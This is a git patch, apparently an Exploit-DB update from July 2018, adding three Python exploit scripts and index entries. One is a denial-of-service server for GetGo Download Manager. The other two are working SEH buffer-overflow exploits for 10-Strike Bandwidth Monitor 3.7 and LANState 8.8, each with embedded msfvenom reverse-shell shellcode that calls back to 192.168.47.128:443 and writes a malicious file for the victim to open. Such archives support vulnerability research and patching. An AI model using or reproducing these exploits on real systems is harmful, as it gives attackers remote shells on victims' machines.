From ed985d30e0340d8d25e3cca6a040a05d44be6f01 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 26 Jul 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-07-26 3 changes to exploits/shellcodes PoDoFo 0.9.5 - Buffer Overflow PoDoFo 0.9.5 - Buffer Overflow (PoC) Windows Speech Recognition - Buffer Overflow Windows Speech Recognition - Buffer Overflow (PoC) GetGo Download Manager 6.2.1.3200 - Denial of Service (PoC) 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH) 10-Strike LANState 8.8 - Local Buffer Overflow (SEH) D-link DAP-1360 - Path Traversal / Cross-Site Scripting --- exploits/windows/dos/45087.py | 47 +++++++ exploits/windows/local/45085.py | 61 +++++++++ exploits/windows/local/45086.py | 227 ++++++++++++++++++++++++++++++++ files_exploits.csv | 9 +- 4 files changed, 341 insertions(+), 3 deletions(-) create mode 100755 exploits/windows/dos/45087.py create mode 100755 exploits/windows/local/45085.py create mode 100755 exploits/windows/local/45086.py diff --git a/exploits/windows/dos/45087.py b/exploits/windows/dos/45087.py new file mode 100755 index 000000000..4aff96beb --- /dev/null +++ b/exploits/windows/dos/45087.py @@ -0,0 +1,47 @@ +# Exploit Title: GetGo Download Manager 6.2.1.3200 - Buffer Overflow (Denial of Service) +# Date: 2018-07-25 +# Exploit Author: Nathu Nandwani +# Website: http://nandtech.co +# CVE: CVE-2017-17849 +# Tested On: Windows 7 x86, Windows 10 x64 +# +# Details +# +# The downloader feature of GetGo Download Manager is vulnerable +# to a buffer overflow which can cause a denial of service. +# To test the proof of concept, have it executed in your machine +# and let the GetGo application download 'index.html' from your +# given IP. +# +# SEH details (Windows 7 x86): +# +# SEH chain of thread 00000644, item 1 +# Address=0863E2C8 +# SE handler=68463967 <-> 4108 offset +# +# SEH chain of thread 00000644, item 2 +# Address=46386746 <-> 4104 offset +# SE handler=*** CORRUPT ENTRY *** + +import socket + +server_ip = "0.0.0.0" +server_port = 80 +payload = "A" * 4104 + "BBBB" + "\xcc\xcc\xcc\xcc" + "D" * 11000 + "\r\n" + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.bind((server_ip, server_port)) +sock.listen(1) + +print "Currently listening at " + server_ip + ":" + str(server_port) + +client, (client_host, client_port) = sock.accept() +print "Client connected: " + client_host + ":" + str(client_port) +print "" +print client.recv(1000) + +client.send(payload) +print "Sent payload" + +client.close() +sock.close() \ No newline at end of file diff --git a/exploits/windows/local/45085.py b/exploits/windows/local/45085.py new file mode 100755 index 000000000..219c4c2af --- /dev/null +++ b/exploits/windows/local/45085.py @@ -0,0 +1,61 @@ +# Title: 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow SEH +# Date: 2018-07-24 +# Exploit Author: absolomb +# Vendor Homepage: https://www.10-strike.com/products.shtml +# Software Link: https://www.10-strike.com/bandwidth-monitor/download.shtml +# Run script, open up generated txt file and copy to clipboard +# Open Bandwith Monitor, Enter my key, Paste code from clipboard, hit OK, boom shell. +# Or from inside the app you can go to the Help tab, click Registration and Paste code from clipboard, hit OK, boom shell. + +#!/usr/bin/python + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -b '\x00\x0a\x0d' -f python -v shellcode +shellcode = "" +shellcode += "\xbb\x03\xe2\x9b\xb7\xda\xc3\xd9\x74\x24\xf4\x5e" +shellcode += "\x29\xc9\xb1\x52\x31\x5e\x12\x83\xc6\x04\x03\x5d" +shellcode += "\xec\x79\x42\x9d\x18\xff\xad\x5d\xd9\x60\x27\xb8" +shellcode += "\xe8\xa0\x53\xc9\x5b\x11\x17\x9f\x57\xda\x75\x0b" +shellcode += "\xe3\xae\x51\x3c\x44\x04\x84\x73\x55\x35\xf4\x12" +shellcode += "\xd5\x44\x29\xf4\xe4\x86\x3c\xf5\x21\xfa\xcd\xa7" +shellcode += "\xfa\x70\x63\x57\x8e\xcd\xb8\xdc\xdc\xc0\xb8\x01" +shellcode += "\x94\xe3\xe9\x94\xae\xbd\x29\x17\x62\xb6\x63\x0f" +shellcode += "\x67\xf3\x3a\xa4\x53\x8f\xbc\x6c\xaa\x70\x12\x51" +shellcode += "\x02\x83\x6a\x96\xa5\x7c\x19\xee\xd5\x01\x1a\x35" +shellcode += "\xa7\xdd\xaf\xad\x0f\x95\x08\x09\xb1\x7a\xce\xda" +shellcode += "\xbd\x37\x84\x84\xa1\xc6\x49\xbf\xde\x43\x6c\x6f" +shellcode += "\x57\x17\x4b\xab\x33\xc3\xf2\xea\x99\xa2\x0b\xec" +shellcode += "\x41\x1a\xae\x67\x6f\x4f\xc3\x2a\xf8\xbc\xee\xd4" +shellcode += "\xf8\xaa\x79\xa7\xca\x75\xd2\x2f\x67\xfd\xfc\xa8" +shellcode += "\x88\xd4\xb9\x26\x77\xd7\xb9\x6f\xbc\x83\xe9\x07" +shellcode += "\x15\xac\x61\xd7\x9a\x79\x25\x87\x34\xd2\x86\x77" +shellcode += "\xf5\x82\x6e\x9d\xfa\xfd\x8f\x9e\xd0\x95\x3a\x65" +shellcode += "\xb3\x59\x12\x4a\xc3\x32\x61\x94\xc2\x79\xec\x72" +shellcode += "\xae\x6d\xb9\x2d\x47\x17\xe0\xa5\xf6\xd8\x3e\xc0" +shellcode += "\x39\x52\xcd\x35\xf7\x93\xb8\x25\x60\x54\xf7\x17" +shellcode += "\x27\x6b\x2d\x3f\xab\xfe\xaa\xbf\xa2\xe2\x64\xe8" +shellcode += "\xe3\xd5\x7c\x7c\x1e\x4f\xd7\x62\xe3\x09\x10\x26" +shellcode += "\x38\xea\x9f\xa7\xcd\x56\x84\xb7\x0b\x56\x80\xe3" +shellcode += "\xc3\x01\x5e\x5d\xa2\xfb\x10\x37\x7c\x57\xfb\xdf" +shellcode += "\xf9\x9b\x3c\x99\x05\xf6\xca\x45\xb7\xaf\x8a\x7a" +shellcode += "\x78\x38\x1b\x03\x64\xd8\xe4\xde\x2c\xe8\xae\x42" +shellcode += "\x04\x61\x77\x17\x14\xec\x88\xc2\x5b\x09\x0b\xe6" +shellcode += "\x23\xee\x13\x83\x26\xaa\x93\x78\x5b\xa3\x71\x7e" +shellcode += "\xc8\xc4\x53" + +# JMP always true +nseh = '\x71\x06\x70\x04' + +# 0x01174647 POP POP RET BandMonitor.exe +seh = '\x47\x46\x17\x01' + +payload = '\x41' * 4188 +payload += nseh +payload += seh +payload += shellcode +payload += '\x41' * (1804 - len(shellcode)) + +file = open('sploit.txt','w') +print "Size: " + str(len(payload)) + " bytes" +file.write(payload) +file.close() +print "TXT file created!" \ No newline at end of file diff --git a/exploits/windows/local/45086.py b/exploits/windows/local/45086.py new file mode 100755 index 000000000..4dcc0f7ab --- /dev/null +++ b/exploits/windows/local/45086.py @@ -0,0 +1,227 @@ +# Exploit Title: 10-Strike LANState 8.8 - Local Buffer Overflow (SEH) +# Date: 2018-07-24 +# Exploit Author: absolomb +# Vendor Homepage: https://www.10-strike.com/products.shtml +# Software Link: https://www.10-strike.com/lanstate/download.shtml +# Version 8.8 +# Tested on: Windows 7 SP 1 x86 + +# Open LANState, File -> Open, browse to generated lsm file, boom shell. +# If it doesn't work first try, close the tab at the bottom and reopen the file + +#!/usr/bin/python + +lsm = """[VERSION INFO] +PROG_NAME=LANState +PROG_VER=8.85 +MAP_VER=8.3 +MAPID=584636991 + +[OBJECT#4] +index=4 +ObjName= +ObjCaption={0} +ObjHint= +ObjLink= +POS_X=100 +POS_Y=0 +Width=65 +Height=65 +ImageWidth=31 +ImageHeight=32 +StdImageIndex=1 +ImageFilePath= +FontName=Arial +FontColor=0 +FontSize=8 +FontCharset=1 +FontStyle=0 +TextAlignment=2 +TextLayout=0 +ObjType=1 +OBJ_ID=1 +TYPE_ID=2 +IP= +REMOTE_NAME=A +MAP_NAME= +MAC_ADDR= +OS= +SNMPAgent=0 +SNMPVer=1 +SNMPUname= +SNMPPassw= +SNMPPrivPassw= +SNMPSecLevel=0 +SNMPAuthType=0 +SNMPPrivType=0 +Community= +ALWAYS_ON=0 +ImageEnabled=0 +ImageFile= +IPList= +CurrentUser= +DESCRIPT= +CheckInterval=60 +DownTime1=0 +DownTime1Start=12:00:00 AM +DownTime1Finish=12:00:00 AM +DownTime2=0 +DownTime2Start=12:00:00 AM +DownTime2Finish=12:00:00 AM +DownTime3=0 +DownTime3Start=12:00:00 AM +DownTime3Finish=12:00:00 AM +DownTime4=0 +DownTime4Start=12:00:00 AM +DownTime4Finish=12:00:00 AM +DownTime5=0 +DownTime5Start=12:00:00 AM +DownTime5Finish=12:00:00 AM +DownTime6=0 +DownTime6Start=12:00:00 AM +DownTime6Finish=12:00:00 AM +DownTime7=0 +DownTime7Start=12:00:00 AM +DownTime7Finish=12:00:00 AM +DTDoNotAlert=1 +RunFirstOnly=0 +FirstIsPassed=1 +CHECK#0/HostAddr={0} +CHECK#0/CID=1 +CHECK#0/NumRetries=1 +CHECK#0/RetInterval=30 +CHECK#0/IsMainCheck=0 +CHECK#0/KeepStat=1 +CHECK#0/CheckType=0 +CHECK#0/CheckOn=1 +CHECK#0/CheckRTTime=0 +CHECK#0/RTTime=1000 +CHECK#0/PacketsCount=4 +CHECK#0/TimeOut=500 +CHECK#0/SizeBuf=32 + +[VIEW] +FonImage=0 +FonImageFile= +ImagePosition=0 +ImageOffsetX=16 +ImageOffsetY=16 +ImgW=0 +ImgH=0 +ImgAutoSize=1 +ScaleFactor=1 +ScrollX=0 +ScrollY=0 +BkGroundColor=16777215 +FontName=Arial +FontColor=-16777208 +FontSize=8 +FontCharset=1 +FontStyle=0 +Gradient=0 +Color1=15780518 +Color2=16777215 +WebUseSmallIcons=0 +CurIconSize=32 +LockAreas=0 +LockLines=0 +LockHosts=0 +WindowState=2 +WindowTop=-10 +WindowsLeft=12 +WindowWidth=800 +WindowsHeight=600 + +""" + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode +shellcode = "" +shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" +shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +shellcode += "\x42\x75\x4a\x49\x49\x6c\x6b\x58\x4f\x72\x57\x70" +shellcode += "\x47\x70\x77\x70\x75\x30\x6c\x49\x69\x75\x45\x61" +shellcode += "\x4b\x70\x71\x74\x4c\x4b\x62\x70\x64\x70\x4e\x6b" +shellcode += "\x62\x72\x54\x4c\x6e\x6b\x71\x42\x65\x44\x4c\x4b" +shellcode += "\x70\x72\x34\x68\x64\x4f\x4d\x67\x62\x6a\x76\x46" +shellcode += "\x56\x51\x79\x6f\x6e\x4c\x65\x6c\x75\x31\x71\x6c" +shellcode += "\x44\x42\x74\x6c\x61\x30\x59\x51\x7a\x6f\x64\x4d" +shellcode += "\x47\x71\x58\x47\x49\x72\x6a\x52\x66\x32\x62\x77" +shellcode += "\x6e\x6b\x50\x52\x56\x70\x6e\x6b\x53\x7a\x77\x4c" +shellcode += "\x4c\x4b\x50\x4c\x46\x71\x73\x48\x38\x63\x62\x68" +shellcode += "\x37\x71\x78\x51\x30\x51\x6e\x6b\x73\x69\x75\x70" +shellcode += "\x67\x71\x78\x53\x4e\x6b\x77\x39\x64\x58\x68\x63" +shellcode += "\x75\x6a\x37\x39\x4c\x4b\x55\x64\x4e\x6b\x35\x51" +shellcode += "\x6a\x76\x74\x71\x6b\x4f\x6c\x6c\x6f\x31\x7a\x6f" +shellcode += "\x56\x6d\x75\x51\x4a\x67\x75\x68\x4d\x30\x30\x75" +shellcode += "\x78\x76\x43\x33\x53\x4d\x68\x78\x37\x4b\x61\x6d" +shellcode += "\x65\x74\x44\x35\x4a\x44\x30\x58\x4c\x4b\x62\x78" +shellcode += "\x31\x34\x35\x51\x4b\x63\x31\x76\x6c\x4b\x46\x6c" +shellcode += "\x72\x6b\x6e\x6b\x66\x38\x35\x4c\x35\x51\x6b\x63" +shellcode += "\x6c\x4b\x74\x44\x6c\x4b\x53\x31\x78\x50\x6e\x69" +shellcode += "\x73\x74\x44\x64\x35\x74\x43\x6b\x63\x6b\x51\x71" +shellcode += "\x32\x79\x50\x5a\x73\x61\x79\x6f\x79\x70\x31\x4f" +shellcode += "\x33\x6f\x51\x4a\x6e\x6b\x45\x42\x7a\x4b\x4c\x4d" +shellcode += "\x43\x6d\x73\x58\x57\x43\x67\x42\x55\x50\x43\x30" +shellcode += "\x51\x78\x42\x57\x42\x53\x66\x52\x71\x4f\x66\x34" +shellcode += "\x45\x38\x72\x6c\x73\x47\x57\x56\x37\x77\x49\x6f" +shellcode += "\x7a\x75\x68\x38\x7a\x30\x43\x31\x43\x30\x33\x30" +shellcode += "\x36\x49\x4a\x64\x73\x64\x62\x70\x30\x68\x44\x69" +shellcode += "\x4d\x50\x30\x6b\x37\x70\x69\x6f\x59\x45\x62\x70" +shellcode += "\x42\x70\x76\x30\x30\x50\x61\x50\x62\x70\x57\x30" +shellcode += "\x46\x30\x51\x78\x78\x6a\x54\x4f\x49\x4f\x6b\x50" +shellcode += "\x6b\x4f\x4a\x75\x4a\x37\x53\x5a\x57\x75\x42\x48" +shellcode += "\x39\x50\x69\x38\x36\x4f\x4b\x30\x50\x68\x34\x42" +shellcode += "\x65\x50\x65\x51\x4d\x6b\x6c\x49\x39\x76\x33\x5a" +shellcode += "\x36\x70\x72\x76\x76\x37\x31\x78\x7a\x39\x4d\x75" +shellcode += "\x52\x54\x61\x71\x59\x6f\x79\x45\x6b\x35\x39\x50" +shellcode += "\x62\x54\x34\x4c\x39\x6f\x50\x4e\x77\x78\x62\x55" +shellcode += "\x78\x6c\x53\x58\x48\x70\x4c\x75\x39\x32\x76\x36" +shellcode += "\x59\x6f\x58\x55\x70\x68\x53\x53\x52\x4d\x62\x44" +shellcode += "\x43\x30\x4e\x69\x6a\x43\x71\x47\x71\x47\x61\x47" +shellcode += "\x64\x71\x39\x66\x50\x6a\x34\x52\x33\x69\x42\x76" +shellcode += "\x38\x62\x4b\x4d\x51\x76\x4a\x67\x51\x54\x75\x74" +shellcode += "\x47\x4c\x56\x61\x46\x61\x6c\x4d\x37\x34\x57\x54" +shellcode += "\x54\x50\x7a\x66\x65\x50\x42\x64\x50\x54\x52\x70" +shellcode += "\x73\x66\x71\x46\x31\x46\x37\x36\x32\x76\x42\x6e" +shellcode += "\x33\x66\x71\x46\x62\x73\x61\x46\x32\x48\x50\x79" +shellcode += "\x38\x4c\x45\x6f\x4d\x56\x6b\x4f\x79\x45\x4f\x79" +shellcode += "\x49\x70\x52\x6e\x62\x76\x37\x36\x4b\x4f\x34\x70" +shellcode += "\x65\x38\x57\x78\x6e\x67\x65\x4d\x35\x30\x69\x6f" +shellcode += "\x58\x55\x4d\x6b\x5a\x50\x4f\x45\x69\x32\x33\x66" +shellcode += "\x42\x48\x6d\x76\x6c\x55\x4d\x6d\x4f\x6d\x49\x6f" +shellcode += "\x4a\x75\x75\x6c\x43\x36\x63\x4c\x67\x7a\x6f\x70" +shellcode += "\x6b\x4b\x6b\x50\x43\x45\x56\x65\x6f\x4b\x43\x77" +shellcode += "\x62\x33\x73\x42\x72\x4f\x33\x5a\x55\x50\x63\x63" +shellcode += "\x79\x6f\x6e\x35\x41\x41" + +align_stack = '\x58' # POP EAX +align_stack += '\x58' # POP EAX +align_stack += '\x05\x61\x55\x55\x55' # ADD EAX,55555561 +align_stack += '\x05\x61\x55\x55\x55' # ADD EAX,55555561 +align_stack += '\x05\x62\x56\x55\x55' # ADD EAX,55555662 +align_stack += '\x50' # PUSH EAX +align_stack += '\x5f' # POP EDI + +# JMP always true +nseh = '\x71\x06\x70\x04' + +#01BA7647 POP POP RET LANState.exe +seh = '\x47\x76\xba\x01' + +payload = '\x41' * 235 +payload += nseh +payload += seh +payload += align_stack +payload += '\x41' * 265 +payload += shellcode +payload += '\x41' * (3492 -len(shellcode + align_stack)) + +buffer = lsm.format(payload) + +file = open('sploit.lsm','w') +print "Size: " + str(len(payload)) + " bytes" +file.write(buffer) +file.close() +print "Map file created!" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2f62d6227..14e23e315 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5988,7 +5988,7 @@ id,file,description,date,author,type,platform,port 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple, 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux, 44944,exploits/linux/dos/44944.txt,"KVM (Nested Virtualization) - L1 Guest Privilege Escalation",2018-06-25,"Google Security Research",dos,linux, -44946,exploits/linux/dos/44946.txt,"PoDoFo 0.9.5 - Buffer Overflow",2018-06-26,r4xis,dos,linux, +44946,exploits/linux/dos/44946.txt,"PoDoFo 0.9.5 - Buffer Overflow (PoC)",2018-06-26,r4xis,dos,linux, 44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php, 44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos, 44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple, @@ -6024,7 +6024,8 @@ id,file,description,date,author,type,platform,port 45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple, 45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware, 45082,exploits/linux/dos/45082.txt,"Nagios Core 4.4.1 - Denial of Service",2018-07-24,"Fakhri Zulkifli",dos,linux, -45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow",2018-07-23,"Nassim Asrir",dos,windows, +45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows, +45087,exploits/windows/dos/45087.py,"GetGo Download Manager 6.2.1.3200 - Denial of Service (PoC)",2018-07-25,"Nathu Nandwani",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9827,6 +9828,8 @@ id,file,description,date,author,type,platform,port 45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple, 45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux, 45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows, +45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, +45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39701,4 +39704,4 @@ id,file,description,date,author,type,platform,port 45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware, 45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware, 45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80 -45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware, +45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80